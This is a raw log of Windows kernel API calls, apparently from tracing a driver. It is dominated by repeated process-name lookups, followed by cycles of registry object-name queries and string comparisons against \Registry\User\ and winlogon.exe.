| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
